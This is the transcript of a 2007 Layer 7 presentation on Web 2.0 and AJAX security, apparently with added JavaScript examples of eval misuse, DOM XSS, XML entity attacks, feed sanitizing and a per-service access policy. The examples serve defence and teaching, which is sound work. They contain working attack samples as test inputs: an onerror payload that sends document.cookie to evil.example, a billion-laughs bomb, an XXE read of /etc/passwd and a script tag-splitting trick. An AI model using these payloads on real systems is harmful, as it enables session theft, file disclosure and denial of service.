layer 7: securing web 2.0 - what you need to know

January 2007. Securing Web 2.0: What You Need to Know. K. Scott Morrison, VP Engineering and Chief Architect

Upload: ca-api-management

Post on 22-May-2015


DESCRIPTION

Web 2.0 has provided users with enhanced capabilities, but with it comes new security risks.

TRANSCRIPT

Page 1: Layer 7: Securing Web 2.0 - What You Need to Know

January 2007

Securing Web 2.0

What You Need to Know

K. Scott Morrison

VP Engineering and Chief Architect

Page 2: Layer 7: Securing Web 2.0 - What You Need to Know

SecureSpan™ Gateway Overview Proprietary and Confidential

Bio – K. Scott Morrison

VP Engineering & Chief Architect at Layer 7 Technologies

• http://www.layer7tech.com

• Layer 7 is based in Vancouver BC, Canada

Co-author of Sams’ Java Web Services Unleashed and Wrox’s Professional JMS

• Over 50 other publications in academic journals and trade magazines

Co-Editor WS-I Basic Security Profile

Co-Author WS-Federation

Frequent speaker on Web services, XML, mobile/wireless computing systems, distributed systems architecture, and Java design issues

Page 3: Layer 7: Securing Web 2.0 - What You Need to Know

Agenda

• Web 2.0

• AJAX

• What’s new about this?

• The collision between AJAX & SOA

• What are the new threat vectors

• Mitigation strategies

• Infrastructure solutions

Page 4: Layer 7: Securing Web 2.0 - What You Need to Know

Web 2.0

Web 2.0 isn’t a technology

It’s actually an approach to building for the Web

Web 2.0 is:

Aggregation of content

Collaboration

Synergizing the efforts of individuals

Rich interaction models

Remember: “You” is not a technology

Graphic source: http://www.time.com/time/covers/0,16641,20061225,00.html

MySpace

Flickr

Google Maps

Google Gmail

Google Suggest

del.icio.us

…etc

Page 5: Layer 7: Securing Web 2.0 - What You Need to Know

AJAX

AJAX is an approach underpinning Web 2.0

Provides rich browser interaction models

• This contributes to the goal of fostering individual contributions

Can also be used to aggregate content

AJAX is really a slick new name for existing technology:

1. (X)HTML and CSS for presentation markup

2. DOM and JavaScript for dynamic content

3. XMLHttpRequest (XHR), IFrame, or the dynamic <SCRIPT> hack for asynchronous content retrieval

4. XML, JSON, JavaScript objects, or just text for data communication

So what is different here?
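One thing that is different is item 4 above: when the data format is "JavaScript objects", the client usually turns the response into data by evaluating it. The example below is added here and is not code from the slides or from Layer 7; it runs under Node.js, the two response bodies are constructed for the demonstration, and the service name is the one used later in the deck. It shows a hostile body that eval() happily executes while still handing back a plausible quote object, and the same body being refused by a data-only parser.

```javascript
// Added example, not from the original slides: what goes wrong when the
// "JavaScript objects" transport is consumed with eval(), beside the
// data-only parser that refuses the same body. Runs under Node.js; both
// response bodies are constructed here, no network involved.

// A well-formed JSON quote response, as a getStockQuote() service might send.
const GOOD_BODY = '{"symbol":"ACME","quote":42.5}';

// A constructed hostile response from a compromised or spoofed service.
// It is valid JavaScript, not valid JSON: it still evaluates to a
// plausible quote object, so a naive client notices nothing, but it runs
// arbitrary code with the page's privileges first.
const EVIL_BODY =
  '(function () { globalThis.injected = "attacker code ran"; ' +
  'return {"symbol":"ACME","quote":42.5}; })()';

// The early-AJAX idiom: wrap the body in parentheses and eval() it.
function parseWithEval(body) {
  return eval('(' + body + ')');
}

// The safe alternative: JSON.parse only accepts JSON literals. Anything
// else is a SyntaxError and nothing is executed.
function parseWithJson(body) {
  return JSON.parse(body);
}

// Feed one body through one parser and report what happened: whether it
// parsed, the quote it yielded, whether code ran as a side effect
// (tracked through globalThis.injected), and the error class if any.
function evaluate(parser, body) {
  delete globalThis.injected;
  let parsed = null;
  let error = null;
  try {
    parsed = parser(body);
  } catch (e) {
    error = e.constructor.name;
  }
  return {
    parsed: parsed !== null,
    quote: parsed ? parsed.quote : undefined,
    codeRan: globalThis.injected !== undefined,
    error,
  };
}

// Stand-alone run: one line per parser/body combination.
for (const [name, parser] of [['eval', parseWithEval], ['JSON.parse', parseWithJson]]) {
  for (const [label, body] of [['good', GOOD_BODY], ['evil', EVIL_BODY]]) {
    console.log(name, label, evaluate(parser, body));
  }
}
```

The eval() path reports `codeRan: true` for the hostile body and still returns `quote: 42.5`, which is exactly why a client that only checks the shape of the result never notices. JSON.parse reports a SyntaxError with nothing executed. The same reasoning applies to the dynamic <SCRIPT> hack in item 3: a script tag pointed at another origin executes whatever comes back, with no parser in between at all.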

Page 6: Layer 7: Securing Web 2.0 - What You Need to Know

Web 1.0

[Diagram: Web Browser → Internet → Firewall → Corporate Network (Web Application Server, Network Directory Server)]

User clicks link, presses button, is referred, etc

Page 7: Layer 7: Securing Web 2.0 - What You Need to Know

Web 1.0 (cont.)

[Diagram: same topology as the previous slide]

HTTP Request: HTTP GET or POST, carrying HTTP headers plus query params or POST contents, from the Web Browser through the Firewall to the Web Application Server

AuthN, AuthR at the Web Application Server

Page 8: Layer 7: Securing Web 2.0 - What You Need to Know

Web 1.0 (cont.)

[Diagram: same topology as the previous slide]

HTTP Response: HTML, images, JavaScript, etc

New page rendered

User experiences long latency delays that affect usability

Page 9: Layer 7: Securing Web 2.0 - What You Need to Know

Web 2.0 – AJAX Paradigm

[Diagram: same topology as the previous slide]

Request as before

HTTP Response: HTML, images, JavaScript engine, etc

Page load: HTML with embedded JavaScript engine

Separation between presentation and content retrieval

Page 10: Layer 7: Securing Web 2.0 - What You Need to Know

Web 2.0 – AJAX Paradigm (cont.)

[Diagram: Web Browser (AJAX engine) → Internet → Firewall → Corporate Network (Web Application Server exposing a Service, Network Directory Server)]

User interacts with the AJAX engine

HTTP Request: HTTP GET, POST, PUT, DELETE, HEAD, etc, sent to the Service

HTTP Response: XML, JSON, JavaScript objects, text, etc

Page 11: Layer 7: Securing Web 2.0 - What You Need to Know

Web 2.0 – Server Side Aggregations

[Diagram: Web Browser → Internet → Firewall → Corporate Network (Web Application Server, Network Directory Server) → External Feeds and Services (RSS, ATOM, XML, etc)]

User interacts with web app server

Server pulls external information and returns an aggregate content page

There are also models for client-side (browser) aggregation

This, of course, could also be an AJAX-based application

Look familiar? It’s data integration all over again…

New data, new transport, same old problems

Page 12: Layer 7: Securing Web 2.0 - What You Need to Know

What are the Threats?

Threats Against The Client

[Diagram: Web Browser containing the AJAX Engine]

New attack surface: the AJAX engine itself

Loads of potential parameter & injection attacks. Attempts to hijack session tokens, cookies, etc.

Cross Site Scripting (XSS), Cross Site Request Forgery (XSRF)

Turn off JavaScript??? No.

Lots of potentially dangerous things to query or even set. Consider the DOM:

• document.URL

• document.cookie

• document.domain

• document.referrer

• etc…
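The DOM properties listed above are dangerous in combination: script in the AJAX engine reads document.URL and writes part of it back into the page, and whatever that injected markup does can read document.cookie. The example below is added here and is not code from the slides or from Layer 7. Node.js has no DOM, so the page logic is modelled as functions that return the HTML the engine would assign to innerHTML; the hostnames, the attack URL and the payload are constructed for the demonstration.

```javascript
// Added example, not from the original slides: a DOM-based XSS inside the
// AJAX engine itself. A page reads a value out of document.URL and writes
// it into the document with innerHTML. Because Node.js has no DOM, the
// page logic is modelled as functions that return the HTML string the
// engine would assign; the URLs and payload are constructed here.

// What a page does when it pulls a parameter out of document.URL.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name) || '';
}

// Vulnerable: the untrusted value is concatenated straight into markup.
function greetingUnsafe(url) {
  return '<h1>Welcome, ' + queryParam(url, 'user') + '</h1>';
}

// Encode the characters that change meaning in HTML text and attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same markup, but the parameter is treated as data, not HTML.
// In a real page, assigning to textContent instead of innerHTML gives the
// same guarantee without string escaping.
function greetingSafe(url) {
  return '<h1>Welcome, ' + escapeHtml(queryParam(url, 'user')) + '</h1>';
}

// Constructed attack URL. The payload uses an <img onerror> handler rather
// than <script>, because markup inserted through innerHTML does not run
// <script> elements but does fire event handlers. The handler reads
// document.cookie and ships it to an attacker-controlled host.
const PAYLOAD =
  '<img src=x onerror="new Image().src=\'https://evil.example/c?\'+document.cookie">';
const ATTACK_URL = 'https://app.example/profile?user=' + encodeURIComponent(PAYLOAD);

// True if the returned HTML contains a live element with an event handler.
function hasInjectedHandler(html) {
  return /<img\b[^>]*\bonerror=/i.test(html);
}

console.log(greetingUnsafe(ATTACK_URL));
console.log(greetingSafe(ATTACK_URL));
```

Two practical notes. Marking the session cookie HttpOnly keeps it out of document.cookie, which blunts this particular payload, but it does not stop injected script from making authenticated requests on the user's behalf, so it is a backstop rather than a fix. And the fix lives on the server side of the slide's argument: the page has to ship code that treats document.URL, document.referrer and every service response as data, never as markup.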

Page 13: Layer 7: Securing Web 2.0 - What You Need to Know

What are the Threats? (cont.)

Threats Against The Server

[Diagram: Firewall (ports 80, 443 open) in front of the Corporate Network and Web Application Server]

Classic attack surface, but with new challenges

In: Richer parameter attacks, XML-based DoS attacks, etc

Out: Information leaking, integrity compromise, injection, etc

Big problem: XML parsers are just too helpful and naive
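"Too helpful" means a stock parser will expand entity declarations it finds in the document and fetch external entities it is pointed at, which is what XML-based DoS and data exfiltration ride on. The screen below is added here and is not code from the slides or from Layer 7; it is the kind of inward check the later "Core Servers" slide calls DoS protect and threat protect, done before the body ever reaches a real parser. It runs under Node.js; the size and depth limits are assumed values, and the documents at the bottom are constructed.

```javascript
// Added example, not from the original slides: a pre-parse "data screen"
// for XML arriving from the Internet, run before the body reaches a real
// parser. It refuses the inputs that naive parsers handle too helpfully:
// any DTD or entity declaration (entity-expansion bombs and external
// entity retrieval), oversize bodies, and deeply nested elements. The
// limits are assumed values; tune them to the schemas you actually serve.

const LIMITS = { maxBytes: 64 * 1024, maxDepth: 32 };

// Returns { ok: true } or { ok: false, reason }. This is a coarse gate,
// not a parser: it walks tags, comments, CDATA and processing
// instructions only far enough to count element depth. Schema validation
// and the parser's own hardening (DTD and external entities disabled)
// still happen behind it.
function screenXml(text, limits = LIMITS) {
  if (Buffer.byteLength(text, 'utf8') > limits.maxBytes) {
    return { ok: false, reason: 'body exceeds size limit' };
  }
  // Refuse every DTD, internal or external: the application's schemas
  // never need one, and it is where the entity tricks live.
  if (/<!DOCTYPE\b|<!ENTITY\b/i.test(text)) {
    return { ok: false, reason: 'DTD or entity declaration present' };
  }
  let depth = 0;
  let i = 0;
  for (;;) {
    const lt = text.indexOf('<', i);
    if (lt < 0) break;
    let end;
    if (text.startsWith('<!--', lt)) {                 // comment
      end = text.indexOf('-->', lt + 4);
      if (end < 0) return { ok: false, reason: 'unterminated comment' };
      i = end + 3;
    } else if (text.startsWith('<![CDATA[', lt)) {     // CDATA: no markup inside
      end = text.indexOf(']]>', lt + 9);
      if (end < 0) return { ok: false, reason: 'unterminated CDATA section' };
      i = end + 3;
    } else if (text.startsWith('<?', lt)) {            // XML declaration or PI
      end = text.indexOf('?>', lt + 2);
      if (end < 0) return { ok: false, reason: 'unterminated processing instruction' };
      i = end + 2;
    } else {                                           // start, end or empty-element tag
      end = text.indexOf('>', lt);
      if (end < 0) return { ok: false, reason: 'unterminated tag' };
      if (text[lt + 1] === '/') {
        depth -= 1;
        if (depth < 0) return { ok: false, reason: 'end tag without start tag' };
      } else if (text[end - 1] !== '/') {
        depth += 1;
        if (depth > limits.maxDepth) return { ok: false, reason: 'nesting exceeds depth limit' };
      }
      i = end + 1;
    }
  }
  return depth === 0 ? { ok: true } : { ok: false, reason: 'unclosed elements' };
}

// Constructed inputs: one benign quote document and three hostile ones.
const GOOD_XML =
  '<?xml version="1.0"?><quote><!-- <not a tag> --><symbol>ACME</symbol>' +
  '<note><![CDATA[<b>raw</b>]]></note><price>42.5</price><flag/></quote>';
const BILLION_LAUGHS =
  '<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">' +
  '<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">]>' +
  '<lolz>&lol2;</lolz>';
const XXE =
  '<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>' +
  '<quote><symbol>&xxe;</symbol></quote>';
const DEEP_NESTING = '<a>'.repeat(40) + '</a>'.repeat(40);

for (const [label, doc] of [['good', GOOD_XML], ['billion laughs', BILLION_LAUGHS],
                            ['xxe', XXE], ['deep', DEEP_NESTING]]) {
  console.log(label, screenXml(doc));
}
```

The screen is deliberately dumb: it never expands anything, so it cannot itself be bombed, and it fails closed on anything it cannot delimit. It is not a substitute for schema validation of the accepted documents, nor for turning off DTD processing in the real parser; it just guarantees the expensive parser only ever sees small, flat, declaration-free input.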

Page 14: Layer 7: Securing Web 2.0 - What You Need to Know

What are the Threats? (cont.)

Threats Against Content

[Diagram: Corporate Network ↔ External Feeds and Services]

Another classic attack surface, but with still more new challenges

In: Session hijacking, unauthorized access, etc

Out: Integrity compromise, injection of poison content like scripts into XML, etc

Note that the aggregator is just another web client. It’s not a browser, but many similar attacks still apply

Page 15: Layer 7: Securing Web 2.0 - What You Need to Know

Why Should You Care?

Big questions around corporate responsibility

Regulatory issues around privacy (HIPAA, PIPEDA, etc)

Regulatory issues around accountability (Sarbox, etc)

Liability for forged transactions

Liability for damage from compromised servers

Not to mention huge issues around brand and reputation damage accrued from a significant security event

Page 16: Layer 7: Securing Web 2.0 - What You Need to Know

Tactical Security Measures

Clients (browsers)

Tough area to secure

Must ensure you are serving solid code: rigorous code review. AJAX has submarine complexity.

Ensure that data streams you serve are validated: redaction, strict validation to tightened schemas

[Diagram: Web Browser]

→ Servers offer clean and secure code

→ Servers offer validated and cleansed data

The problem with JavaScript is that it makes it easy to write code, but hard to write secure code

Page 17: Layer 7: Securing Web 2.0 - What You Need to Know

Tactical Security Measures (cont.)

Core Servers (Web application servers)

More control, and more mature best practices

Add rigorous AuthN, AuthR, Audit

Look at cryptographic model

Inward: DoS protect, threat protect, parameter validate

Outward: Schema validation and redaction

→ Validate params

→ Validate and cleanse data

→ Secure channel

What makes this difficult is the added complexity of XML data structures, and the richer attack surface of service-based APIs

Page 18: Layer 7: Securing Web 2.0 - What You Need to Know

Tactical Security Measures (cont.)

Aggregation Servers (Application servers)

Emerging area, with few best practices

Encourage authenticated access model (you may be forced into this anyway…)

Look at cryptographic model

Incoming data: Validate feed content; strip potential exploits like embedded <SCRIPT> tags

→ Validate and threat protect data feed

→ Authenticate access

→ Secure channel

The big problem here is you may not have control of the source of the data. A large number of sites are cracking down on “unauthorized” use in mashups.

Furthermore, APIs may change radically, making it critical to validate the incoming feed against a schema to catch API updates
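"Strip embedded <SCRIPT> tags" is the natural first instinct for feed content, and it is the instinct attackers count on. The example below is added here and is not code from the slides or from Layer 7. It puts the naive stripper next to an allow-list rewrite and runs both over a constructed feed entry carrying three payloads; the tag allow-list and the hostnames are assumptions for illustration. It runs under Node.js.

```javascript
// Added example, not from the original slides: why "strip the embedded
// <SCRIPT> tags" is not a sufficient threat-protect step for aggregated
// feed content, beside an allow-list rewrite that is. Runs under Node.js
// on a constructed feed entry; the tag allow-list and hostnames are
// assumptions for illustration.

// The naive approach the slide names: remove <script> and </script> tags.
function stripScriptTags(html) {
  return html.replace(/<\/?script\b[^>]*>/gi, '');
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Allow-list approach: escape everything, then reconstruct only a few
// known-safe tags. The escaped text contains no raw '<', so every '<' in
// the output is produced by one of the patterns below; attributes, event
// handlers and unknown tags cannot survive.
const PLAIN_TAGS = ['p', 'b', 'i', 'em', 'strong', 'br'];

function sanitizeFeedHtml(html) {
  let out = escapeHtml(html);
  for (const tag of PLAIN_TAGS) {
    out = out.replace(new RegExp('&lt;(/?)' + tag + '&gt;', 'gi'), '<$1' + tag + '>');
  }
  // Links: only absolute http(s) URLs. The value may not contain an
  // escaped quote or ampersand sequence, so it cannot break out of href.
  out = out.replace(/&lt;a href=&quot;(https?:\/\/[^&\s"']+)&quot;&gt;/gi, '<a href="$1">');
  out = out.replace(/&lt;\/a&gt;/gi, '</a>');
  return out;
}

// Constructed feed entry: real content plus three payloads. Script-tag
// stripping creates the first one and leaves the other two untouched.
const FEED_ENTRY = [
  '<p>Quarterly results <b>up</b>.</p>',
  '<scr<script>ipt>alert(1)</scr</script>ipt>',            // tag splitting
  '<img src=x onerror="new Image().src=\'https://evil.example/c?\'+document.cookie">',
  '<a href="javascript:alert(document.domain)">read more</a>',
  '<a href="https://news.example/story/1">source</a>',
].join('');

// Does the HTML still contain something a browser would execute?
function containsActiveContent(html) {
  return /<script\b/i.test(html) ||
    /<[a-z][^>]*\son[a-z]+\s*=/i.test(html) ||
    /href\s*=\s*["']?\s*javascript:/i.test(html);
}

console.log(stripScriptTags(FEED_ENTRY));
console.log(sanitizeFeedHtml(FEED_ENTRY));
```

The stripper turns the split payload into a working `<script>alert(1)</script>` and never looks at the event handler or the javascript: link. The rewrite keeps the paragraph, the bold text and the https link, and renders the three payloads as inert text. A URL whose query string contains `&` will lose its link under this rewrite because the escaped `&amp;` stops the match; that is the right failure direction for a feed you do not control, and easy to relax once you know which feeds need it.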

Page 19: Layer 7: Securing Web 2.0 - What You Need to Know

Thanks For Nothing Scott: “So How Do I Really Do This?”

You could just build it into your systems…

But that is brittle and error-prone

What you really need is specialized infrastructure built for this purpose

Needs to be:

High performance

Scalable

Simple to configure

And most important: offer tunable security policy

Page 20: Layer 7: Securing Web 2.0 - What You Need to Know

Why Tunable Policy?

Not all services are equal:

getStockQuote(): anonymous access, unsecured channel

buyStock(): authenticated and authorized access, secured (integrity and privacy) channel or message

Policy (the security processing model) must be customized to the business requirements
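What "tunable" looks like in practice is a per-service rule set and one decision function that applies it to every request. The example below is added here and is not code from the slides or from Layer 7. The two services and their security levels are the slide's; the request shape, the parameter patterns and the "trader" role are assumptions for illustration. It also covers the HTTP method control and parameter validation that the deployment slides list later. Runs under Node.js on constructed requests.

```javascript
// Added example, not from the original slides: the two services the slide
// contrasts, expressed as a per-service policy table and enforced by one
// decision function of the kind a gateway runs in front of the application
// server. The request shape, the parameter rules and the "trader" role are
// assumptions for illustration; the services and their security levels
// are the slide's.

const POLICY = {
  // Public price lookup: read-only, anonymous, plain HTTP acceptable.
  getStockQuote: {
    methods: ['GET'],
    requireTls: false,
    requireAuth: false,
    roles: null,                          // no authorization check
    params: { symbol: /^[A-Z]{1,5}$/ },
  },
  // Trade: state-changing, so POST only, authenticated, authorized,
  // and over a channel with integrity and privacy.
  buyStock: {
    methods: ['POST'],
    requireTls: true,
    requireAuth: true,
    roles: ['trader'],
    params: { symbol: /^[A-Z]{1,5}$/, quantity: /^[1-9][0-9]{0,5}$/ },
  },
};

// Own-property lookup only: a service or parameter named "constructor"
// or "toString" must not resolve to something on Object.prototype.
const has = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Evaluate one request against the policy. Returns { allow, reasons }.
// Everything not explicitly permitted is denied: unknown service, extra
// or malformed parameter, wrong method, missing credential or role. All
// failures are collected so the audit record says why.
function decide(policy, req) {
  if (!has(policy, req.service)) return { allow: false, reasons: ['unknown service'] };
  const rule = policy[req.service];
  const params = req.params || {};
  const reasons = [];
  if (!rule.methods.includes(req.method)) reasons.push('method not allowed');
  if (rule.requireTls && !req.tls) reasons.push('secure channel required');
  if (rule.requireAuth && !req.principal) reasons.push('authentication required');
  if (rule.roles && req.principal &&
      !rule.roles.some((r) => (req.principal.roles || []).includes(r))) {
    reasons.push('not authorized for this service');
  }
  for (const name of Object.keys(params)) {
    if (!has(rule.params, name)) reasons.push('unexpected parameter ' + name);
    else if (typeof params[name] !== 'string' || !rule.params[name].test(params[name])) {
      reasons.push('invalid parameter ' + name);
    }
  }
  for (const name of Object.keys(rule.params)) {
    if (!has(params, name)) reasons.push('missing parameter ' + name);
  }
  return { allow: reasons.length === 0, reasons };
}

// Constructed requests, as the gateway sees them after TLS termination.
const QUOTE_REQ = { service: 'getStockQuote', method: 'GET', tls: false,
                    principal: null, params: { symbol: 'ACME' } };
const TRADE_OK = { service: 'buyStock', method: 'POST', tls: true,
                   principal: { name: 'scott', roles: ['trader'] },
                   params: { symbol: 'ACME', quantity: '100' } };
const TRADE_BAD = { service: 'buyStock', method: 'GET', tls: false,
                    principal: null, params: { symbol: "ACME' OR 1=1--" } };

console.log(decide(POLICY, QUOTE_REQ));
console.log(decide(POLICY, TRADE_OK));
console.log(decide(POLICY, TRADE_BAD));
```

The quote request passes with no credential and no TLS, exactly as the slide allows. The bad trade fails on five counts at once: wrong method, plain channel, no credential, a symbol that is not a ticker, and a missing quantity. Two details are worth copying: parameters are matched against an allow-list of names as well as patterns, so a stray `callback` or `debug` parameter is refused rather than passed through, and lookups use own properties only, so a service or parameter named after something on Object.prototype cannot confuse the policy.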

Page 21: Layer 7: Securing Web 2.0 - What You Need to Know

Securing Web 2.0: SecureSpan Data Screen™

Page 22: Layer 7: Securing Web 2.0 - What You Need to Know

Securing Web 2.0: SecureSpan Data Screen™

• Hardware appliance for Web, REST, & AJAX security processing

• ASICs for XML schema validation, XPath, XSLT, cryptographic operations

• Fully clustered

• Policy-based processing model

• Browser-based management and operations console

• Integration with all major directory, IAM, access control servers

• Integration with Symantec antivirus scan engine

[Diagram: web browser-based management and operations console in front of a SecureSpan Data Screen™ cluster]

Page 23: Layer 7: Securing Web 2.0 - What You Need to Know

Securing Web 2.0: SecureSpan Data Screen™

Gateway Deployment For Incoming Calls

[Diagram: Web Browser → Internet → gateway at the corporate network edge → Corporate Network (Web Application Server, Network Directory Server)]

• Wire speed schema validation of XML entering network

• Rigorous HTTP parameter validation

• Tight control over HTTP methods (GET, POST, DELETE, PUT, etc). Control over REST.

• Hardware transformation of XML content in and out of network

• Throttle access to back end services

• Traffic shaping across server farms

• XML threat detection

• Endpoint for SSL and XML document security (encryption, signature & canonicalization according to W3C specs)

• Controlled stripping of <SCRIPT>, eval() (PHP, JS, Python, etc), shell injection attacks, etc to combat XSS

Page 24: Layer 7: Securing Web 2.0 - What You Need to Know

Securing Web 2.0: SecureSpan Data Screen™

Proxy Deployment For Outgoing Calls

[Diagram: Corporate Network (Web Browser, Web Application Server, Network Directory Server) → proxy → External Services (RSS, ATOM, XML, etc)]

• Wire speed validation of XML entering network

• Stripping of potentially harmful data in feeds (<SCRIPT>, etc)

• Management of outgoing cryptography and credentials

• Wire speed transformation of XML data to insulate internal servers from external API changes

Page 25: Layer 7: Securing Web 2.0 - What You Need to Know

Summary

Web 2.0 and the technologies associated with it are too good to ignore

However, they introduce huge new security complexities

The only way to deal with these effectively is with diligence, rigor, and specialized infrastructure to manage an evolving threat model

Layer 7’s SecureSpan Data Screen™ provides the tools to help secure Web 2.0, REST, AJAX, SOA, RSS and ATOM today.

Page 26: Layer 7: Securing Web 2.0 - What You Need to Know


For further information:

K. Scott Morrison

Layer 7 Technologies

1501 – 700 West Georgia St.

Vancouver, B.C. V7Y 1B6

Canada

(800) 681-9377

[email protected]

http://www.layer7tech.com